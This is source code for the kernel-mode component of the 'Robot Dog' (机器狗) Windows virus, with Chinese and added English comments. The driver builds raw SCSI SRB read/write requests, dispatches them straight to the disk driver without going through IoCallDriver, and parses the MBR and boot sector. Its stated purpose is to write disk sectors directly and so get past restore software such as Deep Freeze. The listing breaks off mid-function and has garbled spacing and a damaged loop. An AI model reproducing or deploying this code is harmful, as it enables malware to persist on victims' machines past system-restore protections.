机器狗病毒源码1C语言

// 备注: 获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。

// 编译时注意: FileSystemControl的数据结构需要自己添加。

#include

#include

/* FSCTL code that asks a file system for a file's cluster map
   (VCN -> LCN extents, answered with RETRIEVAL_POINTERS_BUFFER below).
   Not referenced in the visible part of this listing. */
#define FSCTL_GET_RETRIEVAL_POINTERS 0x90073

/* MBR partition-type bytes, compared against PARTITION_ENTRY.PartitionType
   of the first partition in GetPosAndCluster(). */
#define PARTITION_TYPE_NTFS      0x07
#define PARTITION_TYPE_FAT32     0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C

/* Kernel export; GetAtaDr0DevObject() passes *IoDriverObjectType to
   ObReferenceObjectByName() to look a driver object up by name. */
extern POBJECT_TYPE *IoDriverObjectType;

/* File-scope state shared by the routines below. */
LARGE_INTEGER realdiskpos;   /* not read or written anywhere in the visible code */
ULONG sectorspercluster;     /* filled from the boot sector in GetPosAndCluster() */

/*
 * Output layout of FSCTL_GET_RETRIEVAL_POINTERS: a count, the VCN the map
 * starts at, then one (NextVcn, Lcn) pair per extent. Extents[1] is the
 * classic variable-length trailer idiom. Declared here rather than taken
 * from a header (see the "compile-time note" above); not referenced in the
 * visible part of this listing.
 */
typedef struct RETRIEVAL_POINTERS_BUFFER {
    ULONG         ExtentCount;
    LARGE_INTEGER StartingVcn;
    struct {
        LARGE_INTEGER NextVcn;
        LARGE_INTEGER Lcn;
    } Extents[1];
} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;

/* Input buffer for FSCTL_GET_RETRIEVAL_POINTERS: the first VCN to map.
   Not referenced in the visible part of this listing. */
typedef struct { LARGE_INTEGER StartingVcn;
} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;

/*
 * SCSI sense data as laid out by the author (18 bytes of plain unsigned
 * chars; the first byte is labelled Valid only, the error-code bits are not
 * split out). Used solely as the SRB's SenseInfoBuffer in
 * AtapiReadWriteDisk(); nothing in the visible code inspects its contents.
 */
typedef struct _SENSE_DATA {
    unsigned char Valid;
    unsigned char SegmentNumber;
    unsigned char FileMark;
    unsigned char Information[4];
    unsigned char AdditionalSenseLength;
    unsigned char CommandSpecificInformation[4];
    unsigned char AdditionalSenseCode;
    unsigned char AdditionalSenseCodeQualifier;
    unsigned char FieldReplaceableUnitCode;
    unsigned char SenseKeySpecific[3];
} SENSE_DATA, *PSENSE_DATA;

/* On-disk structures below must match the sector byte-for-byte, so padding
   is disabled until the matching #pragma pack() after BBR_SECTOR. */
#pragma pack(1)

/*
 * One 16-byte MBR partition table entry (8 single-byte fields + 2 ULONGs).
 * GetPosAndCluster() reads StartLBA and PartitionType of entry 0 to find
 * where the first partition begins.
 */
typedef struct _PARTITION_ENTRY
{
    UCHAR active;          /* boot-indicator byte */
    UCHAR StartHead;       /* CHS start (unused in the visible code) */
    UCHAR StartSector;
    UCHAR StartCylinder;
    UCHAR PartitionType;   /* compared against PARTITION_TYPE_* */
    UCHAR EndHead;         /* CHS end (unused in the visible code) */
    UCHAR EndSector;
    UCHAR EndCylinder;
    ULONG StartLBA;        /* first sector of the partition, absolute LBA */
    ULONG TotalSector;     /* partition length in sectors */
} PARTITION_ENTRY, *PPARTITION_ENTRY;

/*
 * Master boot record, 512 bytes with pack(1): 446 bytes of boot code, four
 * 16-byte partition entries, 2-byte signature. GetPosAndCluster() overlays
 * this on the buffer it reads from absolute sector 0.
 */
typedef struct _MBR_SECTOR
{
    UCHAR           BootCode[446];
    PARTITION_ENTRY Partition[4];
    USHORT          Signature;
} MBR_SECTOR, *PMBR_SECTOR;

/*
 * Leading fields of a partition boot sector (FAT-style BIOS parameter
 * block), 40 bytes with pack(1); the struct stops at SectorsPerFAT32 and
 * does not cover the rest of the sector. GetPosAndCluster() overlays this on
 * the first sector of partition 0 and uses SectorsPerCluster,
 * ReservedSectors, NumberOfFATs and SectorsPerFAT32. The layout matches FAT
 * boot sectors; for NTFS only the fields up to HiddenSectors line up, so
 * the later fields should be treated as FAT-only (assumption — verify).
 */
typedef struct _BBR_SECTOR
{
    USHORT JmpCode;             /* 3-byte jump split as USHORT + UCHAR */
    UCHAR  NopCode;
    UCHAR  OEMName[8];
    USHORT BytesPerSector;
    UCHAR  SectorsPerCluster;   /* copied to the global sectorspercluster */
    USHORT ReservedSectors;     /* added to the partition start LBA */
    UCHAR  NumberOfFATs;
    USHORT RootEntries;
    USHORT NumberOfSectors16;
    UCHAR  MediaDescriptor;
    USHORT SectorsPerFAT16;
    USHORT SectorsPerTrack;
    USHORT HeadsPerCylinder;
    ULONG  HiddenSectors;
    ULONG  NumberOfSectors32;
    ULONG  SectorsPerFAT32;     /* FAT32 only */
} BBR_SECTOR, *PBBR_SECTOR;

/* restore default alignment for everything that follows */
#pragma pack()

/*
 * One entry of the array returned by ZwQuerySystemInformation() information
 * class 11 (SystemModuleInformation); the buffer starts with a ULONG entry
 * count. GetModuleBase() uses Base, ImageName and ModuleNameOffset only.
 */
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG  Reserved[2];
    PVOID  Base;               /* load address of the module image */
    ULONG  Size;
    ULONG  Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;   /* offset into ImageName (presumably past the directory part) */
    CHAR   ImageName[255];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

/*
 * Kernel export that resolves an object-manager name to a referenced object
 * of the given type. Declared by hand here, presumably because the DDK
 * headers of the time do not expose it. GetAtaDr0DevObject() uses it with
 * *IoDriverObjectType to obtain the "\Driver\Disk" driver object; the caller
 * owns the returned reference (dropped there with ObfDereferenceObject).
 */
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
    IN PUNICODE_STRING ObjectName,
    IN ULONG Attributes,
    IN PACCESS_STATE AccessState OPTIONAL,
    IN ACCESS_MASK DesiredAccess OPTIONAL,
    IN POBJECT_TYPE ObjectType,
    IN KPROCESSOR_MODE AccessMode,
    IN OUT PVOID ParseContext OPTIONAL,
    OUT PVOID *Object);

/*
 * Kernel-mode system information query, declared by hand for the same reason
 * as ObReferenceObjectByName above. GetModuleBase() calls it with class 11
 * (SystemModuleInformation): once with a zero-length buffer to obtain the
 * required size via ReturnLength, then again to fill the real buffer.
 */
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength);

/*
 * Completion routine for hand-built IRPs: copies the final IoStatus into the
 * caller's IO_STATUS_BLOCK (Irp->UserIosb), optionally releases the MDL,
 * signals the caller's event (Irp->UserEvent) and frees the IRP itself.
 * Returning STATUS_MORE_PROCESSING_REQUIRED keeps the I/O manager from
 * touching the already-freed IRP afterwards.
 *
 * DeviceObject  unused
 * Irp           the IRP being completed; freed here
 * Context       when NULL the routine also unlocks and frees Irp->MdlAddress;
 *               when non-NULL the MDL is left for the caller
 *
 * Not referenced in the visible code; IrpCompletionRoutine_0 below is the
 * near-identical copy that AtapiReadWriteDisk() actually installs.
 */
NTSTATUS
IrpCompletionRoutine(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp,
    IN PVOID Context
    ){
    PMDL mdl;
    Irp->UserIosb->Status = Irp->IoStatus.Status;
    Irp->UserIosb->Information = Irp->IoStatus.Information;
    if (!Context)
    {
        mdl = Irp->MdlAddress;
        if (mdl) {
            /* string spacing was lost when this copy was extracted */
            DbgPrint("readsize:%d..", Irp->IoStatus.Information);
            MmUnlockPages(mdl);
            IoFreeMdl(mdl);
        }}
    KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
    IoFreeIrp(Irp);
    return STATUS_MORE_PROCESSING_REQUIRED;
}

/*
 * Completion routine installed by AtapiReadWriteDisk() on its hand-built
 * IRP_MJ_SCSI IRPs. Copies the final IoStatus into the caller's
 * IO_STATUS_BLOCK (Irp->UserIosb), optionally releases the MDL, signals the
 * caller's event (Irp->UserEvent) and frees the IRP. Returning
 * STATUS_MORE_PROCESSING_REQUIRED keeps the I/O manager from touching the
 * already-freed IRP afterwards.
 *
 * DeviceObject  unused
 * Irp           the IRP being completed; freed here
 * Context       AtapiReadWriteDisk() passes its SRB, so Context is never
 *               NULL from the visible caller and the MDL branch below is
 *               not taken — the MDL is not released on that path.
 *
 * Duplicate of IrpCompletionRoutine above apart from brace placement.
 */
NTSTATUS IrpCompletionRoutine_0(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp,
    IN PVOID Context
    ){
    PMDL mdl;
    Irp->UserIosb->Status = Irp->IoStatus.Status;
    Irp->UserIosb->Information = Irp->IoStatus.Information;
    if (!Context)
    {
        mdl = Irp->MdlAddress;
        if (mdl)
        {
            /* string spacing was lost when this copy was extracted */
            DbgPrint("readsize:%d..", Irp->IoStatus.Information);
            MmUnlockPages(mdl);
            IoFreeMdl(mdl);
        }
    }
    KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
    IoFreeIrp(Irp);
    return STATUS_MORE_PROCESSING_REQUIRED;
}

/*
 * Return the load address of the first loaded kernel module whose image name
 * starts with `name` (case-insensitive prefix compare), or 0 if none.
 * Not referenced in the visible code.
 *
 * Enumerates modules through ZwQuerySystemInformation() class 11
 * (SystemModuleInformation): a size probe with a zero-length buffer, then a
 * second call into a non-paged buffer whose first ULONG is the entry count.
 *
 * NOTE(review): neither query nor ExAllocatePool() is checked, and strcpy()
 * into the 255-byte local relies on ImageName being NUL-terminated.
 * NOTE(review): the for-loop header and the `module.ImageName` element
 * selector are damaged in this copy (lost in extraction); left as found.
 */
ULONG GetModuleBase(char *name) {
    ULONG n, i;
    PSYSTEM_MODULE_INFORMATION module;
    PVOID pbuftmp;
    char modulename[255];
    ZwQuerySystemInformation(11, &n, 0, &n);      /* size probe: required length lands in n */
    pbuftmp = ExAllocatePool(NonPagedPool, n);
    ZwQuerySystemInformation(11, pbuftmp, n, NULL);
    module = (PSYSTEM_MODULE_INFORMATION)((PULONG)pbuftmp + 1);   /* skip the leading count */
    n = *((PULONG)pbuftmp);                        /* number of entries */
    for (i = 0; i  /* loop bound and increment truncated in this copy */
    {
        /* ModuleNameOffset presumably selects the file-name part of ImageName — verify */
        strcpy(modulename, module.ImageName + module.ModuleNameOffset);
        if (!_strnicmp(modulename, name, strlen(name))) {
            ExFreePool(pbuftmp);
            return (ULONG)module.Base;
        }
    }
    ExFreePool(pbuftmp);
    return 0;
}

/*
 * Hand-rolled substitute for IoCallDriver(): advances the IRP to its next
 * stack location, records DeviceObject there and calls the target driver's
 * dispatch routine straight out of its MajorFunction table. Because the
 * kernel's IoCallDriver/IofCallDriver is never entered, instrumentation
 * that relies on that routine will not observe these requests; the driver's
 * own dispatch entry (and any monitoring at that level) still sees them.
 *
 * DeviceObject  device whose driver is dispatched to
 * Irp           IRP with at least one unused stack location
 * Returns whatever the dispatch routine returns.
 */
NTSTATUS MyIoCallDriver(PDEVICE_OBJECT DeviceObject, PIRP Irp)   // our own IoCallDriver
{
    PIO_STACK_LOCATION stack;
    --Irp->CurrentLocation;
    stack = IoGetNextIrpStackLocation(Irp);
    Irp->Tail.Overlay.CurrentStackLocation = stack;   // advance the stack location
    stack->DeviceObject = DeviceObject;
    return (DeviceObject->DriverObject->MajorFunction[(ULONG)stack->MajorFunction])(DeviceObject, Irp);
}

/*
 * Transfer BlockCount 512-byte sectors at LBA DiskPos by hand-building a
 * SCSI READ(10)/WRITE(10) SRB and an IRP_MJ_SCSI IRP and dispatching it to
 * dev_object with MyIoCallDriver(). This is the "send an SRB to the disk
 * driver" step from the header note: the request enters at the disk device
 * itself, below the file-system and volume layers, which is why it is not
 * subject to whatever those layers enforce. For defenders: such I/O is only
 * observable at the disk class driver's IRP_MJ_SCSI dispatch or below.
 *
 * dev_object     disk device object (see GetAtaDr0DevObject())
 * MajorFunction  IRP_MJ_READ or IRP_MJ_WRITE; selects the CDB opcode and
 *                the SRB data direction
 * buffer         at least BlockCount * 512 bytes; locked with
 *                MmProbeAndLockPages without a __try guard
 * DiskPos        absolute sector number; a 32-bit LBA as the CDB holds it
 * BlockCount     sectors to transfer (see the Cdb[7] note below)
 *
 * Returns the NTSTATUS from the driver — a failing status is retried up to
 * 8 times with a short stall between attempts — or
 * STATUS_INSUFFICIENT_RESOURCES when an allocation fails.
 *
 * NOTE(review): irp from IoAllocateIrp() is used unchecked; the srb is
 * leaked when the sense allocation fails; and because Context is non-NULL
 * the completion routine does not release the MDL, so each attempt leaks
 * its MDL. Left as written.
 */
ULONG AtapiReadWriteDisk(PDEVICE_OBJECT dev_object, ULONG MajorFunction, PVOID buffer, ULONG DiskPos, int BlockCount)
{
    NTSTATUS status;
    PSCSI_REQUEST_BLOCK srb;
    PSENSE_DATA sense;
    KEVENT Event;
    PIRP irp;
    PMDL mdl;
    IO_STATUS_BLOCK isb;
    PIO_STACK_LOCATION isl;
    PVOID psense;
    int count = 8;                                   /* retry budget */
    while (1) {
        srb = ExAllocatePool(0, sizeof(SCSI_REQUEST_BLOCK));
        if (!srb)
            break;
        sense = ExAllocatePool(0, sizeof(SENSE_DATA));
        psense = sense;                              /* remembered so it can be freed even if the driver swaps SenseInfoBuffer */
        if (!sense)
            break;
        memset(srb, 0, sizeof(SCSI_REQUEST_BLOCK));
        memset(sense, 0, sizeof(SENSE_DATA));
        srb->Length = sizeof(SCSI_REQUEST_BLOCK);    // for more on SRBs see "SCSI Bus and IDE Interface: Protocols, Applications and Programming" and "The SCSI Programmer's Guide"
        srb->Function = 0;                           /* 0 == SRB_FUNCTION_EXECUTE_SCSI */
        srb->DataBuffer = buffer;
        srb->DataTransferLength = BlockCount << 9;   // sector size * number of sectors
        srb->QueueAction = SRB_FLAGS_DISABLE_AUTOSENSE;   /* a SrbFlags bit stored in QueueAction — looks like a slip; kept as-is */
        srb->SrbStatus = 0;
        srb->ScsiStatus = 0;
        srb->NextSrb = 0;
        srb->SenseInfoBuffer = sense;
        srb->SenseInfoBufferLength = sizeof(SENSE_DATA);
        if (MajorFunction == IRP_MJ_READ)
            srb->SrbFlags = SRB_FLAGS_DATA_IN;
        else
            srb->SrbFlags = SRB_FLAGS_DATA_OUT;
        if (MajorFunction == IRP_MJ_READ)
            srb->SrbFlags |= SRB_FLAGS_ADAPTER_CACHE_ENABLE;
        srb->SrbFlags |= SRB_FLAGS_DISABLE_AUTOSENSE;
        srb->TimeOutValue = (srb->DataTransferLength >> 10) + 1;   /* roughly one second per KiB, plus one */
        srb->QueueSortKey = DiskPos;
        srb->CdbLength = 10;
        /* opcode: IRP_MJ_READ (3) -> 2*(3+17) = 0x28 READ(10); IRP_MJ_WRITE (4) -> 0x2A WRITE(10) */
        srb->Cdb[0] = 2 * ((UCHAR)MajorFunction + 17);
        srb->Cdb[1] = srb->Cdb[1] & 0x1F | 0x80;    /* Cdb[1] is 0 after memset, so this just sets bit 7 */
        srb->Cdb[2] = (unsigned char)(DiskPos >> 0x18) & 0xFF;   // LBA, big-endian in bytes 2..5
        srb->Cdb[3] = (unsigned char)(DiskPos >> 0x10) & 0xFF;   //
        srb->Cdb[4] = (unsigned char)(DiskPos >> 0x08) & 0xFF;   //
        srb->Cdb[5] = (UCHAR)DiskPos;                // fill in the sector position
        /* NOTE(review): the cast binds before the shift, so Cdb[7] is always 0 and only the low byte of BlockCount reaches the CDB */
        srb->Cdb[7] = (UCHAR)BlockCount >> 0x08;
        srb->Cdb[8] = (UCHAR)BlockCount;
        // By: Eros412
        KeInitializeEvent(&Event, 0, 0);
        irp = IoAllocateIrp(dev_object->StackSize, 0);
        mdl = IoAllocateMdl(buffer, BlockCount << 9, 0, 0, irp);
        irp->MdlAddress = mdl;
        if (!mdl) {
            ExFreePool(srb);
            ExFreePool(psense);
            IoFreeIrp(irp);
            return STATUS_INSUFFICIENT_RESOURCES;
        }
        /* third argument: 0 = IoReadAccess, 1 = IoWriteAccess — note a disk read lands data in the buffer, so this appears reversed from the usual choice */
        MmProbeAndLockPages(mdl, 0, (MajorFunction == IRP_MJ_READ ? 0 : 1));
        srb->OriginalRequest = irp;
        irp->UserIosb = &isb;                        /* completion routine copies IoStatus here ... */
        irp->UserEvent = &Event;                     /* ... and signals this */
        irp->IoStatus.Status = 0;
        irp->IoStatus.Information = 0;
        irp->Flags = IRP_SYNCHRONOUS_API | IRP_NOCACHE;
        irp->AssociatedIrp.SystemBuffer = 0;
        irp->Cancel = 0;
        irp->RequestorMode = 0;                      /* 0 == KernelMode */
        irp->CancelRoutine = 0;
        irp->Tail.Overlay.Thread = PsGetCurrentThread();
        isl = IoGetNextIrpStackLocation(irp);
        isl->DeviceObject = dev_object;
        isl->MajorFunction = IRP_MJ_SCSI;
        isl->Parameters.Scsi.Srb = srb;
        isl->CompletionRoutine = IrpCompletionRoutine_0;
        isl->Context = srb;                          /* non-NULL: see the MDL note in the header */
        isl->Control = SL_INVOKE_ON_CANCEL | SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_ERROR;
        status = MyIoCallDriver(dev_object, irp);
        KeWaitForSingleObject(&Event, 0, 0, 0, 0);   /* completion routine signals and frees irp */
        if (srb->SenseInfoBuffer != psense && srb->SenseInfoBuffer)
            ExFreePool(srb->SenseInfoBuffer);        /* presumably in case a lower driver replaced the sense buffer */
        ExFreePool(srb);
        ExFreePool(psense);
        if (status >= 0 || !count)
            return status;
        DbgPrint("SendXXXFailed..%08x\r\n", status);
        KeStallExecutionProcessor(1u);
        --count;
    }
    return STATUS_INSUFFICIENT_RESOURCES;
}

/*
 * Walk the device list hanging off drv_object and return the last device
 * object whose DeviceType is FILE_DEVICE_DISK, or NULL if there is none.
 * The loop does not stop at the first match, so the entry furthest down the
 * list wins; the author's comment identifies it as DR0 (presumably
 * \Device\Harddisk0\DR0, on the assumption that the list is newest-first —
 * verify on the target system).
 */
PDEVICE_OBJECT GetLastDiskDeviceObject(PDRIVER_OBJECT drv_object)   // this is DR0
{
    PDEVICE_OBJECT result;
    PDEVICE_OBJECT finddev;
    finddev = drv_object->DeviceObject;
    result = NULL;
    while (finddev)
    {
        if (finddev->DeviceType == FILE_DEVICE_DISK)
            result = finddev;
        finddev = finddev->NextDevice;
    }
    return result;
}

/*
 * Look up the disk class driver object "\Driver\Disk" by name and return its
 * DR0 device object via GetLastDiskDeviceObject(), or NULL if the lookup
 * fails. Attributes value 64 is OBJ_CASE_INSENSITIVE.
 *
 * The driver-object reference is dropped before returning and no reference
 * is taken on the returned device object, so the pointer is unowned.
 */
PDEVICE_OBJECT GetAtaDr0DevObject() {
    UNICODE_STRING diskstr;
    PDRIVER_OBJECT diskdrv;
    PDEVICE_OBJECT dr0dev;
    RtlInitUnicodeString(&diskstr, L"\\Driver\\Disk");
    if (ObReferenceObjectByName(&diskstr, 64, 0, 0, *IoDriverObjectType, 0, 0, &diskdrv) < 0)
        return NULL;
    dr0dev = GetLastDiskDeviceObject(diskdrv);
    if (dr0dev)
        /* string spacing was lost when this copy was extracted */
        DbgPrint("Eros412said:atadr0devobjis:%08x...", dr0dev);
    ObfDereferenceObject(diskdrv);
    return dr0dev;
}

/*
 * Resolve the device object behind a file object: take the mounted device
 * from the file's VPB (Object->Vpb->DeviceObject); if that is missing, fall
 * back to Object->DeviceObject — but only when the device's own VPB also
 * leads nowhere, otherwise the (NULL) VPB result is returned unchanged.
 * Not referenced in the visible code.
 *
 * NOTE(review): vpb->DeviceObject is dereferenced before vpb is tested for
 * NULL, so the `!vpb` check arrives too late to protect it. Left as written.
 */
PDEVICE_OBJECT GetFileObjectDevice(PFILE_OBJECT Object) {
    PDEVICE_OBJECT result = NULL;
    PVPB vpb;
    vpb = Object->Vpb;
    result = vpb->DeviceObject;
    if (!vpb || !result)
    {
        if (!Object->DeviceObject->Vpb || !Object->DeviceObject->Vpb->DeviceObject)
            result = Object->DeviceObject;
    }
    return result;
}

PLARGE_INTEGERGetPosAndCluster()//得到第一个分区文件数据的起始位置

{

PVOIDbuffer;

ULONGtype,startlba;

inti;

PLARGE_INTEGERresult;

PDEVICE_OBJECTdev;

PMBR_SECTORmbrsec;

PPARTITION_ENTRYpartition0;

PBBR_SECTORbootsec;

result=ExAllocatePool(0,sizeof(LARGE_INTEGER));

dev=GetAtaDr0DevObject();

if(dev){

buffer=ExAllocatePool(0,512);

memset(buffer,0,512);

if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,0,1)>0)

DbgPrint("AtapiReadWriteDiskok");

mbrsec=(PMBR_SECTOR)buffer;

partition0=&mbrsec->Partition[0];

startlba=partition0[0].StartLBA;

type=partition0[0].PartitionType;

DbgPrint("dwPartOnePos:

0x%08x..1",startlba);

result->QuadPart=startlba;

memset(buffer,0,512);

if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,startlba,1)>0){

bootsec=(PBBR_SECTOR)buffer;

DbgPrint("gSectorsPerCluster:

%d...",bootsec->SectorsPerCluster);

sectorspercluster=bootsec->SectorsPerCluster;

}

result->QuadPart+=bootsec->ReservedSectors;

DbgPrint("dwPartOnePos:

%I64x..2\r\n",result->QuadPart);

if(type==PARTITION_TYPE_FAT32||type==PARTITION_TYPE_FAT32_LBA)

result->QuadPart+=bootsec->NumberOfFATs*bootsec->SectorsPerFA
